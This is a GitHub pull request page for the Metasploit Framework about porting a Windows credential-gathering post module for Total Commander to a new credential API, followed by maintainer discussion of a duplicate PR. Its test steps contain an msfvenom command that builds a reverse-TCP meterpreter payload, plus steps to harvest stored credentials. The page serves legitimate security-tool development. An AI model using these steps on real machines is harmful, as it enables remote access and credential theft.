Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update total_command post module to use the new cred API #5480

Closed
wants to merge 1 commit into from

Conversation

void-in
Copy link
Contributor

@void-in void-in commented Jun 4, 2015

This patch updates the post/windows/gather/credentials/total_command module to use the new cred API.

  • Download total commander from the official download page at http://www.ghisler.com/amazons3.php
  • After installation, go to Net -> FTP Connect and press New Connection
  • Fill out the Session, Host, Username, and Password fields
  • In a new terminal, create a payload: ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/test.exe
  • Drag and drop the payload executable to Windows, double click on it.
  • At the meterpreter prompt, run background
  • do: use post/multi/gather/dbvis_enum
  • do: set SESSION [session-id]
  • do: run
  • After the module is completed, run the creds command, The newly discovered credentials should be displayed
Credentials
===========

host          service                 public             private   realm  private_type
----          -------                 ------             -------   -----  ------------
                                                                          Blank password
1.1.1.1       3306/tcp (mysql)        test               test             Password
1.1.1.1       54321/tcp (postgresql)  msf_user           password         Password
1.1.1.1       21/tcp (ftp)            msf_user           password         Password

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jun 4, 2015

Hey @void-in, it looks like the PR is the same as: #5449

Can I close this one and merge the changes on my branch? I'll make sure to credit you. Thanks!

@void-in
Copy link
Contributor Author

void-in commented Jun 4, 2015

@wchen-r7 That's right. Sorry for the duplicate. I was searching which modules have been ported to the creds. At that time I didn't find you have an outstanding PR. If one thing you can change please: the variable names in the decrypt method should be more descriptive. I will generate a PR for your branch so that you could easily merge it with yours.

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jun 4, 2015

I will do that, thanks!

wchen-r7 pushed a commit to wchen-r7/metasploit-framework that referenced this pull request Jun 4, 2015
@wchen-r7
Copy link
Contributor

wchen-r7 commented Jun 4, 2015

Ok done!

@wchen-r7 wchen-r7 closed this Jun 4, 2015
@void-in void-in deleted the total_commandar_creds_api branch June 22, 2015 09:05
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants